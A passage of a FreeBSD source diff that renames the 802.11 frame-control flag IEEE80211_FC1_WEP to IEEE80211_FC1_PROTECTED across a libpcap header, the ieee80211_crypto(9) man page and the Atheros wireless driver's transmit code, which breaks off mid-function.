diff --git a/contrib/libpcap/ieee80211.h b/contrib/libpcap/ieee80211.h index d79f0f8e3656..894a9e761a96 100644 --- a/contrib/libpcap/ieee80211.h +++ b/contrib/libpcap/ieee80211.h @@ -1,146 +1,146 @@ /*- * Copyright (c) 2001 Atsushi Onoe * Copyright (c) 2002-2005 Sam Leffler, Errno Consulting * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. The name of the author may not be used to endorse or promote products * derived from this software without specific prior written permission. * * Alternatively, this software may be distributed under the terms of the * GNU General Public License ("GPL") version 2 as published by the Free * Software Foundation. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. * * $FreeBSD$ */ #ifndef _NET80211_IEEE80211_H_ #define _NET80211_IEEE80211_H_ /* * 802.11 protocol definitions. */ #define IEEE80211_FC0_VERSION_MASK 0x03 #define IEEE80211_FC0_VERSION_SHIFT 0 #define IEEE80211_FC0_VERSION_0 0x00 #define IEEE80211_FC0_TYPE_MASK 0x0c #define IEEE80211_FC0_TYPE_SHIFT 2 #define IEEE80211_FC0_TYPE_MGT 0x00 #define IEEE80211_FC0_TYPE_CTL 0x04 #define IEEE80211_FC0_TYPE_DATA 0x08 #define IEEE80211_FC0_SUBTYPE_MASK 0xf0 #define IEEE80211_FC0_SUBTYPE_SHIFT 4 /* for TYPE_MGT */ #define IEEE80211_FC0_SUBTYPE_ASSOC_REQ 0x00 #define IEEE80211_FC0_SUBTYPE_ASSOC_RESP 0x10 #define IEEE80211_FC0_SUBTYPE_REASSOC_REQ 0x20 #define IEEE80211_FC0_SUBTYPE_REASSOC_RESP 0x30 #define IEEE80211_FC0_SUBTYPE_PROBE_REQ 0x40 #define IEEE80211_FC0_SUBTYPE_PROBE_RESP 0x50 #define IEEE80211_FC0_SUBTYPE_BEACON 0x80 #define IEEE80211_FC0_SUBTYPE_ATIM 0x90 #define IEEE80211_FC0_SUBTYPE_DISASSOC 0xa0 #define IEEE80211_FC0_SUBTYPE_AUTH 0xb0 #define IEEE80211_FC0_SUBTYPE_DEAUTH 0xc0 /* for TYPE_CTL */ #define IEEE80211_FC0_SUBTYPE_PS_POLL 0xa0 #define IEEE80211_FC0_SUBTYPE_RTS 0xb0 #define IEEE80211_FC0_SUBTYPE_CTS 0xc0 #define IEEE80211_FC0_SUBTYPE_ACK 0xd0 #define IEEE80211_FC0_SUBTYPE_CF_END 0xe0 #define IEEE80211_FC0_SUBTYPE_CF_END_ACK 0xf0 /* for TYPE_DATA (bit combination) */ #define IEEE80211_FC0_SUBTYPE_DATA 0x00 #define IEEE80211_FC0_SUBTYPE_CF_ACK 0x10 #define IEEE80211_FC0_SUBTYPE_CF_POLL 0x20 #define IEEE80211_FC0_SUBTYPE_CF_ACPL 0x30 #define IEEE80211_FC0_SUBTYPE_NODATA 0x40 #define IEEE80211_FC0_SUBTYPE_NODATA_CF_ACK 0x50 #define IEEE80211_FC0_SUBTYPE_NODATA_CF_POLL 0x60 #define IEEE80211_FC0_SUBTYPE_NODATA_CF_ACPL 0x70 #define IEEE80211_FC0_SUBTYPE_QOS 0x80 #define IEEE80211_FC0_SUBTYPE_QOS_NULL 0xc0 #define IEEE80211_FC1_DIR_MASK 0x03 #define IEEE80211_FC1_DIR_NODS 0x00 /* STA->STA */ #define IEEE80211_FC1_DIR_TODS 0x01 /* STA->AP */ #define IEEE80211_FC1_DIR_FROMDS 0x02 /* AP ->STA */ #define IEEE80211_FC1_DIR_DSTODS 0x03 /* AP ->AP */ #define IEEE80211_FC1_MORE_FRAG 0x04 #define IEEE80211_FC1_RETRY 0x08 #define IEEE80211_FC1_PWR_MGT 0x10 #define IEEE80211_FC1_MORE_DATA 0x20 -#define IEEE80211_FC1_WEP 0x40 +#define IEEE80211_FC1_PROTECTED 0x40 #define IEEE80211_FC1_ORDER 0x80 #define IEEE80211_SEQ_FRAG_MASK 0x000f #define IEEE80211_SEQ_FRAG_SHIFT 0 #define IEEE80211_SEQ_SEQ_MASK 0xfff0 #define IEEE80211_SEQ_SEQ_SHIFT 4 #define IEEE80211_NWID_LEN 32 #define IEEE80211_QOS_TXOP 0x00ff /* bit 8 is reserved */ #define IEEE80211_QOS_ACKPOLICY 0x60 #define IEEE80211_QOS_ACKPOLICY_S 5 #define IEEE80211_QOS_ESOP 0x10 #define IEEE80211_QOS_ESOP_S 4 #define IEEE80211_QOS_TID 0x0f #define IEEE80211_MGT_SUBTYPE_NAMES { \ "assoc-req", "assoc-resp", \ "reassoc-req", "reassoc-resp", \ "probe-req", "probe-resp", \ "reserved#6", "reserved#7", \ "beacon", "atim", \ "disassoc", "auth", \ "deauth", "reserved#13", \ "reserved#14", "reserved#15" \ } #define IEEE80211_CTL_SUBTYPE_NAMES { \ "reserved#0", "reserved#1", \ "reserved#2", "reserved#3", \ "reserved#3", "reserved#5", \ "reserved#6", "reserved#7", \ "reserved#8", "reserved#9", \ "ps-poll", "rts", \ "cts", "ack", \ "cf-end", "cf-end-ack" \ } #define IEEE80211_DATA_SUBTYPE_NAMES { \ "data", "data-cf-ack", \ "data-cf-poll", "data-cf-ack-poll", \ "null", "cf-ack", \ "cf-poll", "cf-ack-poll", \ "qos-data", "qos-data-cf-ack", \ "qos-data-cf-poll", "qos-data-cf-ack-poll", \ "qos", "reserved#13", \ "qos-cf-poll", "qos-cf-ack-poll" \ } #define IEEE80211_TYPE_NAMES { "mgt", "ctl", "data", "reserved#4" } #endif /* _NET80211_IEEE80211_H_ */ diff --git a/share/man/man9/ieee80211_crypto.9 b/share/man/man9/ieee80211_crypto.9 index 9f48f21fd605..c82b87663197 100644 --- a/share/man/man9/ieee80211_crypto.9 +++ b/share/man/man9/ieee80211_crypto.9 @@ -1,260 +1,260 @@ .\" .\" Copyright (c) 2004 Bruce M. Simpson .\" Copyright (c) 2004 Darron Broad .\" All rights reserved. .\" .\" Redistribution and use in source and binary forms, with or without .\" modification, are permitted provided that the following conditions .\" are met: .\" 1. Redistributions of source code must retain the above copyright .\" notice, this list of conditions and the following disclaimer. .\" 2. Redistributions in binary form must reproduce the above copyright .\" notice, this list of conditions and the following disclaimer in the .\" documentation and/or other materials provided with the distribution. .\" .\" THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND .\" ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE .\" IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE .\" ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE .\" FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL .\" DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS .\" OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) .\" HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT .\" LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY .\" OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF .\" SUCH DAMAGE. .\" .\" $FreeBSD$ .\" $Id: ieee80211_crypto.9,v 1.3 2004/03/04 10:42:56 bruce Exp $ .\" .Dd March 29, 2010 .Dt IEEE80211_CRYPTO 9 .Os .Sh NAME .Nm ieee80211_crypto .Nd 802.11 cryptographic support .Sh SYNOPSIS .In net80211/ieee80211_var.h .\" .Pp .Ft void .Fn ieee80211_crypto_register "const struct ieee80211_cipher *" .\" .Ft void .Fn ieee80211_crypto_unregister "const struct ieee80211_cipher *" .\" .Ft int .Fn ieee80211_crypto_available "int cipher" .\" .Pp .Ft void .Fo ieee80211_notify_replay_failure .Fa "struct ieee80211vap *" .Fa "const struct ieee80211_frame *" .Fa "const struct ieee80211_key *" .Fa "uint64_t rsc" .Fa "int tid" .Fc .\" .Ft void .Fo ieee80211_notify_michael_failure .Fa "struct ieee80211vap *" .Fa "const struct ieee80211_frame *" .Fa "u_int keyix" .Fc .\" .Ft int .Fo ieee80211_crypto_newkey .Fa "struct ieee80211vap *" .Fa "int cipher" .Fa "int flags" .Fa "struct ieee80211_key *" .Fc .\" .Ft int .Fn ieee80211_crypto_setkey "struct ieee80211vap *" "struct ieee80211_key *" .\" .Ft int .Fn ieee80211_crypto_delkey "struct ieee80211vap *" "struct ieee80211_key *" .\" .Ft void .Fn ieee80211_key_update_begin "struct ieee80211vap *" .\" .Ft void .Fn ieee80211_key_update_end "struct ieee80211vap *" .\" .Ft void .Fn ieee80211_crypto_delglobalkeys "struct ieee80211vap *" .\" .Ft void .Fn ieee80211_crypto_reload_keys "struct ieee80211com *" .\" .Pp .Ft struct ieee80211_key * .Fn ieee80211_crypto_encap "struct ieee80211_node *" "struct mbuf *" .\" .Ft struct ieee80211_key * .Fn ieee80211_crypto_decap "struct ieee80211_node *" "struct mbuf *" "int flags" .\" .Ft int .Fo ieee80211_crypto_demic .Fa "struct ieee80211vap *" .Fa "struct ieee80211_key *" .Fa "struct mbuf *" .Fa "int force" .Fc .\" .Ft int .Fo ieee80211_crypto_enmic .Fa "struct ieee80211vap *" .Fa "struct ieee80211_key *" .Fa "struct mbuf *" .Fa "int force" .Fc .Sh DESCRIPTION The .Nm net80211 layer includes comprehensive cryptographic support for 802.11 protocols. Software implementations of ciphers required by WPA and 802.11i are provided as well as encap/decap processing of 802.11 frames. Software ciphers are written as kernel modules and register with the core crypto support. The cryptographic framework supports hardware acceleration of ciphers by drivers with automatic fall-back to software implementations when a driver is unable to provide necessary hardware services. .Sh CRYPTO CIPHER MODULES .Nm net80211 cipher modules register their services using .Fn ieee80211_crypto_register and supply a template that describes their operation. This .Vt ieee80211_cipher structure defines protocol-related state such as the number of bytes of space in the 802.11 header to reserve/remove during encap/decap and entry points for setting up keys and doing cryptographic operations. .Pp Cipher modules can associate private state to each key through the .Vt wk_private structure member. If state is setup by the module it will be called before a key is destroyed so it can reclaim resources. .Pp Crypto modules can notify the system of two events. When a packet replay event is recognized .Fn ieee80211_notify_replay_failure can be used to signal the event. When a .Dv TKIP Michael failure is detected .Fn ieee80211_notify_michael_failure can be invoked. Drivers may also use these routines to signal events detected by the hardware. .Sh CRYPTO KEY MANAGEMENT The .Nm net80211 layer implements a per-vap 4-element .Dq global key table and a per-station .Dq unicast key for protocols such as WPA, 802.1x, and 802.11i. The global key table is designed to support legacy WEP operation and Multicast/Group keys, though some applications also use it to implement WPA in station mode. Keys in the global table are identified by a key index in the range 0-3. Per-station keys are identified by the MAC address of the station and are typically used for unicast PTK bindings. .Pp .Nm net80211 provides .Xr ioctl 2 operations for managing both global and per-station keys. Drivers typically do not participate in software key management; they are involved only when providing hardware acceleration of cryptographic operations. .Pp .Fn ieee80211_crypto_newkey is used to allocate a new .Nm net80211 key or reconfigure an existing key. The cipher must be specified along with any fixed key index. The .Nm net80211 layer will handle allocating cipher and driver resources to support the key. .Pp Once a key is allocated it's contents can be set using .Fn ieee80211_crypto_setkey and deleted with .Fn ieee80211_crypto_delkey (with any cipher and driver resources reclaimed). .Pp .Fn ieee80211_crypto_delglobalkeys is used to reclaim all keys in the global key table for a vap; it typically is used only within the .Nm net80211 layer. .Pp .Fn ieee80211_crypto_reload_keys handles hardware key state reloading from software key state, such as required after a suspend/resume cycle. .Sh DRIVER CRYPTO SUPPORT Drivers identify ciphers they have hardware support for through the .Vt ic_cryptocaps field of the .Vt ieee80211com structure. If hardware support is available then a driver should also fill in the .Dv iv_key_alloc , .Dv iv_key_set , and .Dv iv_key_delete methods of each .Vt ieee80211vap created for use with the device. In addition the methods .Dv iv_key_update_begin and .Dv iv_key_update_end can be setup to handle synchronization requirements for updating hardware key state. .Pp When .Nm net80211 allocates a software key and the driver can accelerate the cipher operations the .Dv iv_key_alloc method will be invoked. Drivers may return a token that is associated with outbound traffic (for use in encrypting frames). Otherwise, e.g. if hardware resources are not available, the driver will not return a token and .Nm net80211 will arrange to do the work in software and pass frames to the driver that are already prepared for transmission. .Pp For receive, drivers mark frames with the .Dv M_WEP mbuf flag to indicate the hardware has decrypted the payload. If frames have the -.Dv IEEE80211_FC1_WEP +.Dv IEEE80211_FC1_PROTECTED bit marked in their 802.11 header and are not tagged with .Dv M_WEP then decryption is done in software. For more complicated scenarios the software key state is consulted; e.g. to decide if Michael verification needs to be done in software after the hardware has handled TKIP decryption. .Pp Drivers that manage complicated key data structures, e.g. faulting software keys into a hardware key cache, can safely manipulate software key state by bracketing their work with calls to .Fn ieee80211_key_update_begin and .Fn ieee80211_key_update_end . These calls also synchronize hardware key state update when receive traffic is active. .Sh SEE ALSO .Xr ieee80211 9 , .Xr ioctl 2 , .Xr wlan_ccmp 4 , .Xr wlan_tkip 4 , .Xr wlan_wep 4 diff --git a/sys/dev/ath/if_ath_tx.c b/sys/dev/ath/if_ath_tx.c index b529db6dfddc..4492552626ec 100644 --- a/sys/dev/ath/if_ath_tx.c +++ b/sys/dev/ath/if_ath_tx.c @@ -1,6063 +1,6063 @@ /*- * Copyright (c) 2002-2009 Sam Leffler, Errno Consulting * Copyright (c) 2010-2012 Adrian Chadd, Xenion Pty Ltd * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer, * without modification. * 2. Redistributions in binary form must reproduce at minimum a disclaimer * similar to the "NO WARRANTY" disclaimer below ("Disclaimer") and any * redistribution must be conditioned upon including a substantially * similar Disclaimer requirement for further binary redistribution. * * NO WARRANTY * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS * ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT * LIMITED TO, THE IMPLIED WARRANTIES OF NONINFRINGEMENT, MERCHANTIBILITY * AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL * THE COPYRIGHT HOLDERS OR CONTRIBUTORS BE LIABLE FOR SPECIAL, EXEMPLARY, * OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER * IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF * THE POSSIBILITY OF SUCH DAMAGES. */ #include __FBSDID("$FreeBSD$"); /* * Driver for the Atheros Wireless LAN controller. * * This software is derived from work of Atsushi Onoe; his contribution * is greatly appreciated. */ #include "opt_inet.h" #include "opt_ath.h" #include "opt_wlan.h" #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #ifdef IEEE80211_SUPPORT_SUPERG #include #endif #ifdef IEEE80211_SUPPORT_TDMA #include #endif #include #include #ifdef INET #include #include #endif #include #include /* XXX for softled */ #include #include #ifdef ATH_TX99_DIAG #include #endif #include #include #include #ifdef ATH_DEBUG_ALQ #include #endif /* * How many retries to perform in software */ #define SWMAX_RETRIES 10 /* * What queue to throw the non-QoS TID traffic into */ #define ATH_NONQOS_TID_AC WME_AC_VO #if 0 static int ath_tx_node_is_asleep(struct ath_softc *sc, struct ath_node *an); #endif static int ath_tx_ampdu_pending(struct ath_softc *sc, struct ath_node *an, int tid); static int ath_tx_ampdu_running(struct ath_softc *sc, struct ath_node *an, int tid); static ieee80211_seq ath_tx_tid_seqno_assign(struct ath_softc *sc, struct ieee80211_node *ni, struct ath_buf *bf, struct mbuf *m0); static int ath_tx_action_frame_override_queue(struct ath_softc *sc, struct ieee80211_node *ni, struct mbuf *m0, int *tid); static struct ath_buf * ath_tx_retry_clone(struct ath_softc *sc, struct ath_node *an, struct ath_tid *tid, struct ath_buf *bf); #ifdef ATH_DEBUG_ALQ void ath_tx_alq_post(struct ath_softc *sc, struct ath_buf *bf_first) { struct ath_buf *bf; int i, n; const char *ds; /* XXX we should skip out early if debugging isn't enabled! */ bf = bf_first; while (bf != NULL) { /* XXX should ensure bf_nseg > 0! */ if (bf->bf_nseg == 0) break; n = ((bf->bf_nseg - 1) / sc->sc_tx_nmaps) + 1; for (i = 0, ds = (const char *) bf->bf_desc; i < n; i++, ds += sc->sc_tx_desclen) { if_ath_alq_post(&sc->sc_alq, ATH_ALQ_EDMA_TXDESC, sc->sc_tx_desclen, ds); } bf = bf->bf_next; } } #endif /* ATH_DEBUG_ALQ */ /* * Whether to use the 11n rate scenario functions or not */ static inline int ath_tx_is_11n(struct ath_softc *sc) { return ((sc->sc_ah->ah_magic == 0x20065416) || (sc->sc_ah->ah_magic == 0x19741014)); } /* * Obtain the current TID from the given frame. * * Non-QoS frames need to go into TID 16 (IEEE80211_NONQOS_TID.) * This has implications for which AC/priority the packet is placed * in. */ static int ath_tx_gettid(struct ath_softc *sc, const struct mbuf *m0) { const struct ieee80211_frame *wh; int pri = M_WME_GETAC(m0); wh = mtod(m0, const struct ieee80211_frame *); if (! IEEE80211_QOS_HAS_SEQ(wh)) return IEEE80211_NONQOS_TID; else return WME_AC_TO_TID(pri); } static void ath_tx_set_retry(struct ath_softc *sc, struct ath_buf *bf) { struct ieee80211_frame *wh; wh = mtod(bf->bf_m, struct ieee80211_frame *); /* Only update/resync if needed */ if (bf->bf_state.bfs_isretried == 0) { wh->i_fc[1] |= IEEE80211_FC1_RETRY; bus_dmamap_sync(sc->sc_dmat, bf->bf_dmamap, BUS_DMASYNC_PREWRITE); } bf->bf_state.bfs_isretried = 1; bf->bf_state.bfs_retries ++; } /* * Determine what the correct AC queue for the given frame * should be. * * This code assumes that the TIDs map consistently to * the underlying hardware (or software) ath_txq. * Since the sender may try to set an AC which is * arbitrary, non-QoS TIDs may end up being put on * completely different ACs. There's no way to put a * TID into multiple ath_txq's for scheduling, so * for now we override the AC/TXQ selection and set * non-QOS TID frames into the BE queue. * * This may be completely incorrect - specifically, * some management frames may end up out of order * compared to the QoS traffic they're controlling. * I'll look into this later. */ static int ath_tx_getac(struct ath_softc *sc, const struct mbuf *m0) { const struct ieee80211_frame *wh; int pri = M_WME_GETAC(m0); wh = mtod(m0, const struct ieee80211_frame *); if (IEEE80211_QOS_HAS_SEQ(wh)) return pri; return ATH_NONQOS_TID_AC; } void ath_txfrag_cleanup(struct ath_softc *sc, ath_bufhead *frags, struct ieee80211_node *ni) { struct ath_buf *bf, *next; ATH_TXBUF_LOCK_ASSERT(sc); TAILQ_FOREACH_SAFE(bf, frags, bf_list, next) { /* NB: bf assumed clean */ TAILQ_REMOVE(frags, bf, bf_list); ath_returnbuf_head(sc, bf); ieee80211_node_decref(ni); } } /* * Setup xmit of a fragmented frame. Allocate a buffer * for each frag and bump the node reference count to * reflect the held reference to be setup by ath_tx_start. */ int ath_txfrag_setup(struct ath_softc *sc, ath_bufhead *frags, struct mbuf *m0, struct ieee80211_node *ni) { struct mbuf *m; struct ath_buf *bf; ATH_TXBUF_LOCK(sc); for (m = m0->m_nextpkt; m != NULL; m = m->m_nextpkt) { /* XXX non-management? */ bf = _ath_getbuf_locked(sc, ATH_BUFTYPE_NORMAL); if (bf == NULL) { /* out of buffers, cleanup */ DPRINTF(sc, ATH_DEBUG_XMIT, "%s: no buffer?\n", __func__); ath_txfrag_cleanup(sc, frags, ni); break; } ieee80211_node_incref(ni); TAILQ_INSERT_TAIL(frags, bf, bf_list); } ATH_TXBUF_UNLOCK(sc); return !TAILQ_EMPTY(frags); } /* * Reclaim mbuf resources. For fragmented frames we * need to claim each frag chained with m_nextpkt. */ void ath_freetx(struct mbuf *m) { struct mbuf *next; do { next = m->m_nextpkt; m->m_nextpkt = NULL; m_freem(m); } while ((m = next) != NULL); } static int ath_tx_dmasetup(struct ath_softc *sc, struct ath_buf *bf, struct mbuf *m0) { struct mbuf *m; int error; /* * Load the DMA map so any coalescing is done. This * also calculates the number of descriptors we need. */ error = bus_dmamap_load_mbuf_sg(sc->sc_dmat, bf->bf_dmamap, m0, bf->bf_segs, &bf->bf_nseg, BUS_DMA_NOWAIT); if (error == EFBIG) { /* XXX packet requires too many descriptors */ bf->bf_nseg = ATH_MAX_SCATTER + 1; } else if (error != 0) { sc->sc_stats.ast_tx_busdma++; ath_freetx(m0); return error; } /* * Discard null packets and check for packets that * require too many TX descriptors. We try to convert * the latter to a cluster. */ if (bf->bf_nseg > ATH_MAX_SCATTER) { /* too many desc's, linearize */ sc->sc_stats.ast_tx_linear++; m = m_collapse(m0, M_NOWAIT, ATH_MAX_SCATTER); if (m == NULL) { ath_freetx(m0); sc->sc_stats.ast_tx_nombuf++; return ENOMEM; } m0 = m; error = bus_dmamap_load_mbuf_sg(sc->sc_dmat, bf->bf_dmamap, m0, bf->bf_segs, &bf->bf_nseg, BUS_DMA_NOWAIT); if (error != 0) { sc->sc_stats.ast_tx_busdma++; ath_freetx(m0); return error; } KASSERT(bf->bf_nseg <= ATH_MAX_SCATTER, ("too many segments after defrag; nseg %u", bf->bf_nseg)); } else if (bf->bf_nseg == 0) { /* null packet, discard */ sc->sc_stats.ast_tx_nodata++; ath_freetx(m0); return EIO; } DPRINTF(sc, ATH_DEBUG_XMIT, "%s: m %p len %u\n", __func__, m0, m0->m_pkthdr.len); bus_dmamap_sync(sc->sc_dmat, bf->bf_dmamap, BUS_DMASYNC_PREWRITE); bf->bf_m = m0; return 0; } /* * Chain together segments+descriptors for a frame - 11n or otherwise. * * For aggregates, this is called on each frame in the aggregate. */ static void ath_tx_chaindesclist(struct ath_softc *sc, struct ath_desc *ds0, struct ath_buf *bf, int is_aggr, int is_first_subframe, int is_last_subframe) { struct ath_hal *ah = sc->sc_ah; char *ds; int i, bp, dsp; HAL_DMA_ADDR bufAddrList[4]; uint32_t segLenList[4]; int numTxMaps = 1; int isFirstDesc = 1; /* * XXX There's txdma and txdma_mgmt; the descriptor * sizes must match. */ struct ath_descdma *dd = &sc->sc_txdma; /* * Fillin the remainder of the descriptor info. */ /* * We need the number of TX data pointers in each descriptor. * EDMA and later chips support 4 TX buffers per descriptor; * previous chips just support one. */ numTxMaps = sc->sc_tx_nmaps; /* * For EDMA and later chips ensure the TX map is fully populated * before advancing to the next descriptor. */ ds = (char *) bf->bf_desc; bp = dsp = 0; bzero(bufAddrList, sizeof(bufAddrList)); bzero(segLenList, sizeof(segLenList)); for (i = 0; i < bf->bf_nseg; i++) { bufAddrList[bp] = bf->bf_segs[i].ds_addr; segLenList[bp] = bf->bf_segs[i].ds_len; bp++; /* * Go to the next segment if this isn't the last segment * and there's space in the current TX map. */ if ((i != bf->bf_nseg - 1) && (bp < numTxMaps)) continue; /* * Last segment or we're out of buffer pointers. */ bp = 0; if (i == bf->bf_nseg - 1) ath_hal_settxdesclink(ah, (struct ath_desc *) ds, 0); else ath_hal_settxdesclink(ah, (struct ath_desc *) ds, bf->bf_daddr + dd->dd_descsize * (dsp + 1)); /* * XXX This assumes that bfs_txq is the actual destination * hardware queue at this point. It may not have been * assigned, it may actually be pointing to the multicast * software TXQ id. These must be fixed! */ ath_hal_filltxdesc(ah, (struct ath_desc *) ds , bufAddrList , segLenList , bf->bf_descid /* XXX desc id */ , bf->bf_state.bfs_tx_queue , isFirstDesc /* first segment */ , i == bf->bf_nseg - 1 /* last segment */ , (struct ath_desc *) ds0 /* first descriptor */ ); /* * Make sure the 11n aggregate fields are cleared. * * XXX TODO: this doesn't need to be called for * aggregate frames; as it'll be called on all * sub-frames. Since the descriptors are in * non-cacheable memory, this leads to some * rather slow writes on MIPS/ARM platforms. */ if (ath_tx_is_11n(sc)) ath_hal_clr11n_aggr(sc->sc_ah, (struct ath_desc *) ds); /* * If 11n is enabled, set it up as if it's an aggregate * frame. */ if (is_last_subframe) { ath_hal_set11n_aggr_last(sc->sc_ah, (struct ath_desc *) ds); } else if (is_aggr) { /* * This clears the aggrlen field; so * the caller needs to call set_aggr_first()! * * XXX TODO: don't call this for the first * descriptor in the first frame in an * aggregate! */ ath_hal_set11n_aggr_middle(sc->sc_ah, (struct ath_desc *) ds, bf->bf_state.bfs_ndelim); } isFirstDesc = 0; bf->bf_lastds = (struct ath_desc *) ds; /* * Don't forget to skip to the next descriptor. */ ds += sc->sc_tx_desclen; dsp++; /* * .. and don't forget to blank these out! */ bzero(bufAddrList, sizeof(bufAddrList)); bzero(segLenList, sizeof(segLenList)); } bus_dmamap_sync(sc->sc_dmat, bf->bf_dmamap, BUS_DMASYNC_PREWRITE); } /* * Set the rate control fields in the given descriptor based on * the bf_state fields and node state. * * The bfs fields should already be set with the relevant rate * control information, including whether MRR is to be enabled. * * Since the FreeBSD HAL currently sets up the first TX rate * in ath_hal_setuptxdesc(), this will setup the MRR * conditionally for the pre-11n chips, and call ath_buf_set_rate * unconditionally for 11n chips. These require the 11n rate * scenario to be set if MCS rates are enabled, so it's easier * to just always call it. The caller can then only set rates 2, 3 * and 4 if multi-rate retry is needed. */ static void ath_tx_set_ratectrl(struct ath_softc *sc, struct ieee80211_node *ni, struct ath_buf *bf) { struct ath_rc_series *rc = bf->bf_state.bfs_rc; /* If mrr is disabled, blank tries 1, 2, 3 */ if (! bf->bf_state.bfs_ismrr) rc[1].tries = rc[2].tries = rc[3].tries = 0; #if 0 /* * If NOACK is set, just set ntries=1. */ else if (bf->bf_state.bfs_txflags & HAL_TXDESC_NOACK) { rc[1].tries = rc[2].tries = rc[3].tries = 0; rc[0].tries = 1; } #endif /* * Always call - that way a retried descriptor will * have the MRR fields overwritten. * * XXX TODO: see if this is really needed - setting up * the first descriptor should set the MRR fields to 0 * for us anyway. */ if (ath_tx_is_11n(sc)) { ath_buf_set_rate(sc, ni, bf); } else { ath_hal_setupxtxdesc(sc->sc_ah, bf->bf_desc , rc[1].ratecode, rc[1].tries , rc[2].ratecode, rc[2].tries , rc[3].ratecode, rc[3].tries ); } } /* * Setup segments+descriptors for an 11n aggregate. * bf_first is the first buffer in the aggregate. * The descriptor list must already been linked together using * bf->bf_next. */ static void ath_tx_setds_11n(struct ath_softc *sc, struct ath_buf *bf_first) { struct ath_buf *bf, *bf_prev = NULL; struct ath_desc *ds0 = bf_first->bf_desc; DPRINTF(sc, ATH_DEBUG_SW_TX_AGGR, "%s: nframes=%d, al=%d\n", __func__, bf_first->bf_state.bfs_nframes, bf_first->bf_state.bfs_al); bf = bf_first; if (bf->bf_state.bfs_txrate0 == 0) DPRINTF(sc, ATH_DEBUG_SW_TX_AGGR, "%s: bf=%p, txrate0=%d\n", __func__, bf, 0); if (bf->bf_state.bfs_rc[0].ratecode == 0) DPRINTF(sc, ATH_DEBUG_SW_TX_AGGR, "%s: bf=%p, rix0=%d\n", __func__, bf, 0); /* * Setup all descriptors of all subframes - this will * call ath_hal_set11naggrmiddle() on every frame. */ while (bf != NULL) { DPRINTF(sc, ATH_DEBUG_SW_TX_AGGR, "%s: bf=%p, nseg=%d, pktlen=%d, seqno=%d\n", __func__, bf, bf->bf_nseg, bf->bf_state.bfs_pktlen, SEQNO(bf->bf_state.bfs_seqno)); /* * Setup the initial fields for the first descriptor - all * the non-11n specific stuff. */ ath_hal_setuptxdesc(sc->sc_ah, bf->bf_desc , bf->bf_state.bfs_pktlen /* packet length */ , bf->bf_state.bfs_hdrlen /* header length */ , bf->bf_state.bfs_atype /* Atheros packet type */ , bf->bf_state.bfs_txpower /* txpower */ , bf->bf_state.bfs_txrate0 , bf->bf_state.bfs_try0 /* series 0 rate/tries */ , bf->bf_state.bfs_keyix /* key cache index */ , bf->bf_state.bfs_txantenna /* antenna mode */ , bf->bf_state.bfs_txflags | HAL_TXDESC_INTREQ /* flags */ , bf->bf_state.bfs_ctsrate /* rts/cts rate */ , bf->bf_state.bfs_ctsduration /* rts/cts duration */ ); /* * First descriptor? Setup the rate control and initial * aggregate header information. */ if (bf == bf_first) { /* * setup first desc with rate and aggr info */ ath_tx_set_ratectrl(sc, bf->bf_node, bf); } /* * Setup the descriptors for a multi-descriptor frame. * This is both aggregate and non-aggregate aware. */ ath_tx_chaindesclist(sc, ds0, bf, 1, /* is_aggr */ !! (bf == bf_first), /* is_first_subframe */ !! (bf->bf_next == NULL) /* is_last_subframe */ ); if (bf == bf_first) { /* * Initialise the first 11n aggregate with the * aggregate length and aggregate enable bits. */ ath_hal_set11n_aggr_first(sc->sc_ah, ds0, bf->bf_state.bfs_al, 